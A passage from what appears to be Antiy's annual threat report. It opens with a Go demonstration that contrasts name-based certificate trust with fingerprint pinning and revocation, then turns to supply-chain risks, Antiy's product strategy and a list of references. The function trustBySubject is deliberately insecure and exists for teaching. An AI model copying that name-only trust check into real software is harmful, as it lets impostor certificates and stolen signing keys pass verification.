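// fingerprint is the SHA-256 of the DER certificate: the identity that survives
// a copied subject name, because it depends on the key rather than on the name.
func fingerprint(c *x509.Certificate) string {
	sum := sha256.Sum256(c.Raw)
	return hex.EncodeToString(sum[:])
}

// trustBySubject is the flawed policy: a valid self-signature plus a familiar
// vendor name. Anyone can mint a certificate carrying that name.
func trustBySubject(c *x509.Certificate, knownVendors map[string]bool) bool {
	return selfSignatureValid(c) && knownVendors[c.Subject.CommonName]
}

// trustByPinnedKey binds the vendor name to a fingerprint recorded when first
// seen and refuses a fingerprint reported stolen even though its signature
// still verifies (the revocation step the text says the system lacks).
func trustByPinnedKey(c *x509.Certificate, pinned map[string]string, revoked map[string]bool) bool {
	if !selfSignatureValid(c) {
		return false
	}
	fp := fingerprint(c)
	if revoked[fp] {
		return false
	}
	return pinned[c.Subject.CommonName] == fp
}

// runScenario builds a genuine vendor certificate and an impostor with an
// identical subject, evaluates both under both policies, then marks the
// genuine key as stolen and evaluates it again.
func runScenario() (map[string]Verdict, error) {
	const vendor = "Example Vendor Ltd" // constructed name, not a real vendor
	genuine, err := newSelfSigned(vendor)
	if err != nil {
		return nil, err
	}
	impostor, err := newSelfSigned(vendor) // same subject, different key
	if err != nil {
		return nil, err
	}
	known := map[string]bool{vendor: true}
	pinned := map[string]string{vendor: fingerprint(genuine)} // recorded at first sight
	revoked := map[string]bool{}
	out := map[string]Verdict{
		"genuine":  {trustBySubject(genuine, known), trustByPinnedKey(genuine, pinned, revoked)},
		"impostor": {trustBySubject(impostor, known), trustByPinnedKey(impostor, pinned, revoked)},
	}
	revoked[fingerprint(genuine)] = true // the vendor reports its signing key stolen
	out["genuine-after-theft"] = Verdict{trustBySubject(genuine, known), trustByPinnedKey(genuine, pinned, revoked)}
	return out, nil
}

func main() {
	out, err := runScenario()
	if err != nil {
		panic(err)
	}
	for _, n := range []string{"genuine", "impostor", "genuine-after-theft"} {
		fmt.Printf("%-20s by subject: %-5v by pinned key: %v\n", n, out[n].BySubject, out[n].ByPinnedKey)
	}
}
```

The name-based policy accepts the impostor and keeps accepting the stolen key; only the pinned-fingerprint policy with a revocation set rejects both.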

To date, Linux has not established a universally applicable signature authentication system, and even some well-known open-source software on the Windows platform still does not incorporate digital signature mechanisms in its binary releases. Undoubtedly, this presents further challenges to security defenses on Linux.

While a single code signing system is insufficient to guarantee supply chain security in an open environment, it remains a crucial cornerstone of supply chain security. Its more significant role lies in enabling publisher verification and traceability mechanisms. A world without a code signing system is destined to be a worse world.

6.3 Underground Supply Chains and Toolchains, As Well as Third-Party Sourcing Markets, Have Weakened Institutional Clients’ Defenses

While factors such as brand pre-installation and centralized procurement have improved the legality of operating systems and office software, the low security configurations of pirated operating systems, including pre-installed Trojans and malware, still threaten the security of institutional clients. Furthermore, many applications used by institutional clients still rely on online acquisition. Traditional download sites, localization sites, and driver sites commonly employ deceptive download methods, making it difficult for users to find the genuine download entry. Users often download so-called “download recommenders” and other advertising tools. These sites also frequently bundle and re-sign existing software drivers, embedding adware, downloaders, or other Trojans. These download tools and bundled adware generally possess information gathering and secondary download capabilities, creating uncontrolled software security entry points. This can lead to security breaches for institutional clients, and these channels can also be hijacked and exploited by advanced attackers.

6.4 The Internetization of Equipment and Applications Has Formed an Uncontrolled Information Channel Within the Institutional Network

Internet business models are based on user information and behavior, including the collection and aggregation of some privacy data, the value and convenience derived from big data analysis, and users exchanging some system control and personal information for convenient free services. While individual users have come to accept this information collection as an unavoidable norm, it also poses security challenges for institutional users. For example, document editing and note-taking tools connected to cloud storage may lead to the leakage of document content, and the cloud-based nature of input methods may result in the leakage of sensitive input information.

Simultaneously, the internetization of devices and applications expands the scope of enterprise protection, increases protection costs, and makes internal security protection harder. Compared with traditional perimeter protection, the access of emerging devices has expanded the original protection boundary and formed an uncontrolled information channel. While emerging devices and application scenarios become new attack entry points, the internetization of these devices and applications constitutes an out-of-band information flow that gives attackers more ways to locate and profile internal targets, making their targeting more certain and precise. This greatly increases the difficulty of internal security protection.

Security issues at any link in the entire supply chain can have serious consequences if triggered. From the perspective of offense and defense between nations, the impact of supply chain security is evident in security incidents such as Stuxnet, Equation, and the Ukraine blackout. The overall complexity of the supply chain makes its structure difficult to discern clearly. Currently, countries around the world are concerned that superpowers may use their upstream advantages in the supply chain to transform them into unique operational capabilities serving their intelligence agencies, or even to create upstream constraints on downstream entities. The gap between upstream and downstream in the supply chain not only creates technological and profit advantages for upstream businesses but also drives the convergence of information and resources toward them.

Defending against supply chain attacks requires establishing a clear architecture and standards system to encourage effective security considerations at each stage; strengthening security requirements for suppliers’ production and development; and promoting supply chain transparency. The core of supply chain transparency lies in effectively labeling supply chain links, clarifying technology sources, identifying and explaining associated risks, and understanding the risk flow of open-source exploits and third-party modules. Finally, strengthening cooperation with security vendors improves overall system security and threat awareness, extending supply chain security defenses not only to the current stage but also to earlier and later stages, maximizing security coverage.

In summaries of past cases, supply chain attacks have often been portrayed as a peripheral, though frequently used, method of infiltrating core IT environments. However, if this is the only way the issue is understood, a strategic problem is being reduced to a tactical one. We have reason to believe that future cybersecurity confrontations will revolve around “supply chains” and “big data”. Supply chains have never been merely peripheral battlegrounds in cyber warfare; rather, they are the more core and lethal main battlefield.

7. Beliefs Shape Actions (Conclusion)

7.1 Seeking a Systematic Approach to Cybersecurity

In his speech on April 19, General Secretary Xi Jinping emphasized that “we must establish a correct understanding of cybersecurity. Principles determine actions”, and provided a profound interpretation of the fundamental principles governing cybersecurity. Once a correct understanding of cybersecurity has been established, it is crucial to identify effective methods and put them into practice. Progress in cybersecurity involves two aspects: on the one hand, continuously enhancing our capabilities through countering and analyzing threats; on the other hand, consistently discarding erroneous concepts and methods to achieve sustained progress.

How can we respect the holistic, dynamic, open, relative, and collaborative nature of cybersecurity while avoiding flawed security approaches that are fragmented, static, closed-off, absolute, and isolated? How can we implement the requirements for “round-the-clock, all-around awareness of the cybersecurity landscape” and “effective protection”, and how can we put into practice the “dynamic, comprehensive protection philosophy”? How can we achieve the goal of “advancing security and development in tandem”? The team at Antiy is constantly reflecting on, summarizing, and putting these ideas into practice.

Antiy has continuously advanced its “tower defense” approach to security incidents. The core idea of tower defense is to leverage the defender’s first-mover advantage in environmental deployment to form a defensive position. This involves deploying collaborative defense and awareness links at the boundary, traffic, and endpoints, and expanding the customer’s in-depth analytical capabilities. Antiy promotes effective system protection from the perspectives of vendors, customers, and adversaries, ultimately aiming to weaken, delay, and expose the adversary.

We are also actively seeking industry research findings and security methods that align with a correct cybersecurity perspective. Antiy’s public translation team co-translated “The Sliding Scale Model for Cybersecurity” in 2016 and actively shared it with the industry during winter training camps and other events. The related literature divides cybersecurity into five levels: architectural security, passive defense, active defense, threat intelligence, and offense. Except for offense, which is not applicable to general organizations, the other four levels form an organic whole. Cybersecurity planning is based on a fundamental security architecture and reliable passive defense measures, superimposed with effective active defense and threat intelligence measures. Without the foundational support of architectural security and passive defense, higher-level capabilities are difficult to utilize effectively; without the effective introduction of active defense and threat intelligence, basic measures alone cannot effectively combat deep threats. Each security level solves different problems and has a different value. Lower-level security costs less but solves more fundamental and broader problems. From a cybersecurity investment perspective, the earlier a network is in its development, the more important it is to lay a solid foundation at the bottom layer; the higher the value of the assets being protected, the more investment needs to be extended to active defense and threat intelligence. Therefore, as co-translator JOE of this article pointed out, cybersecurity innovation is more about incremental, cumulative innovation than iterative innovation. As the technologies and systems for proactive defense and threat intelligence continue to evolve and innovate, the security architecture and passive defense aspects themselves are also constantly developing and progressing. 
These ideas have opened up new avenues for Antiy to improve the effectiveness of its proactive defense and threat intelligence products, and have also provided a systematic perspective on how to understand the management and value of various technologies and products in the current cybersecurity landscape.

7.2 Our Annual Work

Over a year ago, Antiy held its third annual cybersecurity winter training camp, themed “Snowflakes Flying North”, and released a preliminary draft of its 2015 Basic Threat Report at the opening ceremony. At that time, we had already noticed the loss of control over defenses caused by supply chain attacks, the lowered barrier to advanced attacks brought by commercial sales of cyber weapons, the turning of threat intelligence against defenders through black-market big data, and the emerging trend of combined online and offline attack methods. Once Pandora’s box is opened, the devil cannot be locked back up in a short time.

What particularly prompted our deep reflection was that advanced attackers commonly build simulated sandboxes to conduct simulated tests on various security products used by defenders. How can security products develop capabilities on the customer side that are difficult for attackers to predict? After continuous experimentation, reflection, and adversarial drills, Antiy determined to establish Antiy’s product DNA based on “next-generation threat detection engine, deep customer empowerment, and interactive visualization analysis”.

In 2016, Antiy released new versions of its endpoint protection product IEP, traffic monitoring product PTD, deep analysis product PTA, and threat intelligence product AVL Insight, thus improving and transforming its product line. Antiy also successfully established benchmark cases with high-security clients in the military, public security, customs, power, finance, and telecommunications sectors, and undertook the overall R&D work for multiple situational awareness and monitoring early warning platforms.

In 2012, during the early development of Antiy’s situational awareness system, the introduction of threat visualization enhanced the system’s performance, leading to the slogan “Making Security Visible”. In subsequent security practices, we focused on transforming security visualization from a purely display technology into an operational tool, enabling the correlation analysis of assets and threats at different points in time. We clarified that situational awareness is primarily a security business system built upon reliable basic perception and detection capabilities, in-depth analysis capabilities, top-level judgment capabilities, and operational processes. At the same time, we frequently face the question: what is the difference between situational awareness and traditional SIEM and SOC? SIEM and SOC are effective security practices that aggregate more discrete security elements into a whole. However, we need to recognize that SIEM and SOC emerged in an era when security products were operating in isolation. They emphasized the integration of existing security capabilities and the aggregation of logs, lacking a top-down approach to guiding the planning of more rational client-side and traffic-side capabilities according to a systematic security methodology and driven by top-level security business value. Antiy has accumulated comprehensive endpoint, network-side, and analytics capabilities, with detection and analysis capabilities spanning traditional PCs, mobile devices, and emerging scenarios. This facilitates our ability to design more granular sensing capabilities by working backward from the business needs of upper-level situational awareness.

From the traffic side, we pointed out at XDEF in 2013… [22] Traditional real-time network detection is mostly designed for combating threats such as worms and DDoS, relying on the fact that their payloads and behaviors are repeatedly reproduced. However, it does not adequately consider the highly targeted, one-time delivery of payloads in APT attacks. Traffic monitoring must develop the ability to effectively capture and restore payloads and to conduct linked analysis. In 2016, we did more work on the tracing capabilities of traffic detection devices, achieving forward tracing and backward conditional waiting based on deeply customized rules. This allows the device to switch between high-speed real-time detection and full-element collection detection modes. By expanding the records from five-tuples to thirteen-tuples, we achieved more effective tracing capabilities. At the same time, with the help of the vector parsing capabilities of Antiy’s next-generation threat detection engine, we upgraded the rule expansion capability of network monitoring from simple beacon expansion to vector-level rule expansion.

Regarding endpoint security, our new version of IEP product achieves deep detection of host operating elements and environmental context through comprehensive data collection of key host scenarios. Recognizing the overcorrection of a pure whitelist approach, we have adopted a dual-control reputation model, allowing different groups and targets to choose between a blacklist-centric or whitelist-centric security strategy based on their own risk level. Simultaneously, addressing the common phenomenon of having whitelists but lacking effective protection, we are further enhancing the protection points and deep data collection capabilities of proactive host defense. Based on relevant R&D progress, we will also resume updates to the anti-rootkit tool ATool and release a commercial forensic version.

When sandboxes are viewed as a kind of “detection engine”, we, as long-time explorers and practitioners of sandbox technology, believe this approach is biased. The detection results provided by sandboxes are divergent, and the value of this dynamic vector after decomposition and divergence is more important than the conclusion itself. Antiy insists on using the effective triggering of formatted document and browser vulnerabilities, the fine-grained disclosure of malicious behavior details, and the generation of threat intelligence as the main guiding principles of Antiy PTA analysis products, and insists on making the pre-deployed sandbox a private security capability for users.

In 2016, Antiy put its next-generation threat detection engine concept into practice, transforming the antivirus engine from a decision-maker into an analyzer with decision-making capabilities. The basic working principle of traditional antivirus engines is to skip non-virus formats, preprocess risky formats, and output the judgment results and threat names. Antiy’s next-generation threat detection engine, building upon these functions, adds mechanisms for full-format object recognition and deep analysis, thus providing a more granular decision-making space for upper-level human analysis, automated orchestration, and artificial intelligence.

As a key supply chain security vendor, Antiy is transforming from a provider that solves malware problems to one that takes on greater responsibility. Antiy AVL Inside not only provides mobile phone manufacturers with anti-malware capabilities but also integrates Wi-Fi security, payment security, and URL security. By penetrating the system’s underlying layers, it addresses the problem of security applications having no more access to the system than malicious programs do. This comprehensive expansion of the supply chain extends Antiy’s threat awareness capabilities, enabling it to provide targeted analysis and threat intelligence to clients in high-security industries such as finance.

Based on reliable basic detection and analysis capabilities and supply chain awareness, Antiy has continuously improved the granularity of its situational awareness platform and its business imagination. In developing basic big data analysis capabilities, it avoids overwhelming events by using business processes to achieve overall judgment and decision-making, and conducts visualization work from an asset and reputation perspective, thus returning to the essence of asset value protection.

7.3 To Become a Capabilities-Driven Security Vendor with a Systematic Perspective

In 2016, vendors such as Antiy and 360 Enterprise Security repeatedly used the term “capability-based security vendor” in their analysis reports and conference presentations. Our understanding of capability-based security vendors is as follows:

“Having a firm belief in solving user security problems, having the conviction and courage to face security threats, and adhering to the ethics and values that security vendors should possess”.

Committed to independent research and development and technological innovation, the company possesses core technologies with unique technological value. It has its own distinctive characteristics and strengths in areas such as security threat perception, detection, defense, and analysis, as well as in perception systems, big data accumulation, and other key security technologies.

Relevant capability-based security vendors began advocating for mutual recognition of each other’s achievements this year. Although this agreement may seem straightforward, it is indeed the first step toward collaboration:

“In analysis reports, technical blogs, and morning news, we actively acknowledge and affirm each other’s achievements, clearly state each other’s work and contributions, and provide original links to each other’s technical achievements”.

For the analysis of major events, significant vulnerabilities, and critical systems, if one party has already done substantial work and in-depth analysis, then, adhering to the principles of active interaction and minimizing duplication and unnecessary effort, further in-depth analysis should be conducted based on the achievements of the collaborating party.

Promoting the effective integration of proactive defense, threat intelligence and architectural security, and passive defense, and striving to provide attackers with unpredictable security capabilities at points where attacks are difficult to bypass, to achieve highly automated and actionable security business value, will be the path Antiy chooses in the future.

We remain open, continuing to share our latest analytical reports and technical article compilations, and maintaining our commitment to sharing a weekly technical translation for public benefit, including our participation in the translation of the monumental work “Reverse Engineering for Beginners” this year. While these are minor tasks compared to Antiy’s current size and scale, our engineering culture and traditions will continue to be upheld. We not only look forward to more like-minded individuals joining Antiy’s ranks, but we also anticipate more capable security vendors in China joining us in the fight against threats.

Based on its independently developed core technologies and products for threat detection and defense, Antiy promotes the effective integration of proactive defense, threat intelligence and architectural security, and passive defense. It is committed to providing attackers with unpredictable security capabilities at points where attacks are difficult to bypass, thereby achieving effective protection and highly automated and operable security business value. This will be the path Antiy has chosen for the future.

Being a capable vendor is difficult; achieving genuine customer value is even more challenging. “Where the path is flat and near, many will travel; where the path is rugged and far, few will arrive”. Our understanding of cybersecurity dictates that we must always choose to climb the steepest slopes and tread the most thorny paths. This has been true in the past, and it will be true in the future.

8. Appendix 1: References

[1] Antiy: Comprehensive Analysis Report on the Attack on Ukraine’s Power System

https://www.antiy.com/response/A_Comprehensive_Analysis_Report_on_Ukraine_Power_Grid_Outage/A_Comprehensive_Analysis_Report_on_Ukraine_Power_Grid_Outage.html

[2] SANS ICS Series Reports on the Power Outage in Ukraine

https://ics.sans.org/blog/2015/12/30/current-reporting-on-the-cyber-attack-in-ukraine-resulting-in-power-outage

https://ics.sans.org/blog/2016/01/01/potentialsampleofmalwarefromtheukrainiancyberattackuncovered

https://ics.sans.org/blog/2016/01/09/confirmationofacoordinatedattackontheukrainianpowergrid

https://ics.sans.org/media/EISAC_SANS_Ukraine_DUC_5.pdf

[3] ESET’s Series of Reports on the Power Outage in Ukraine

https://ics.sans.org/blog/2016/03/22/eisacandsansreportontheukrainiangridattack

https://www.welivesecurity.com/2016/01/03/blackenergysshbeardoordetails2015attacksukrainiannewsmediaelectricindustry/

https://www.welivesecurity.com/2016/01/04/blackenergytrojanstrikesagainattacksukrainianelectricpowerindustry/

https://www.welivesecurity.com/2016/01/11/blackenergyandtheukrainianpoweroutagewhatwereallyknow/

https://www.welivesecurity.com/2016/01/25/securityreviewesetstrends2016attacksukrainevirtualizedsecurity/

[4] Antiy: The White Elephant’s Dance: Cyberattacks from the Indian Subcontinent

https://www.antiy.com/response/WhiteElephant/WhiteElephant.html

[5] Antiy: From “Equation” to “Equation Group”: An Analysis of the Cross-Platform Capabilities of the EQUATION Hacking Group’s Advanced Malware

https://www.antiy.com/response/EQUATIONS/EQUATIONS.html

[6] Antiy: A Trojan That Modifies Hard Drive Firmware: Exploring the Attack Components of the EQUATION Group

https://www.antiy.com/response/EQUATION_ANTIY_REPORT.html

[7] Antiy: Analysis of Encryption Techniques in Some Components of the Equation

https://www.antiy.com/response/Equation_part_of_the_component_analysis_of_cryptographic_techniques.html

[8] Kaspersky: Equation: The Death Star of Malware Galaxy

http://securelist.com/blog/research/68750/equationthedeathstarofmalwaregalaxy/

[9] Kaspersky: A Fanny Equation: “I am your father, Stuxnet”

http://securelist.com/blog/research/68787/afannyequationiamyourfatherstuxnet/

[10] Kaspersky: Equation Group: from Houston with love

http://securelist.com/blog/research/68877/equationgroupfromhoustonwithlove/

[11] Kaspersky: Equation Group Questions and Answers

https://securelist.com/files/2015/02/Equation_group_questions_and_answers.pdf

[12] An Easy Win: Using SIGINT to Learn about New Viruses

https://freesnowden.is/wpcontent/uploads/2015/06/projectcamberdada.pdf

[13] Antiy: Analysis of a Sample Used in a Quasi-APT Attack Targeting Chinese Organizations

https://www.antiy.com/response/APTTOCS.html

[14] 360: OceanLotus APT Report

http://bobao.360.cn/news/detail/1601.html

[15] US-CERT: Grizzly Steppe

https://www.us-cert.gov/sites/default/files/publications/JAR_16-20296A_GRIZZLY%20STEPPE-2016-1229.pdf

[16] VentureBeat: Next wave of ransomware could demand millions

https://venturebeat.com/2016/03/26/next-wave-of-ransomware-could-demand-millions/

[17] Antiy Technical Articles Compilation (Vol. 4, No. 3): Hot Topics Edition (Special Feature on “Ransomware”)

[18] Antiy: A Review and Outlook of Cybersecurity Threats in 2015

https://www.antiy.com/response/2015_Antiy_Annual_Security_Report.html

[19] Antiy: Analysis of Zombie Crowds in DDoS Attack Organizations

https://www.antiy.com/response/Chicken_Mutex_MM.html

[20] Antiy: IoT Botnets Seriously Threaten Network Infrastructure Security

https://www.antiy.com/response/Mirai/Mirai.html

[21] Kaspersky: Duqu 2.0 misappropriates Foxconn certificates

https://securelist.com/blog/research/70641/theduqu20persistencemodule/

[22]   Escaping the Territory of Worms and Trojans: The Causes of Traditional Anti-Malicious Code Methods and the Limitations of APT Countermeasures

https://www.antiy.com/resources/Methodology_AVER_Introspection_Trilogy_II.pdf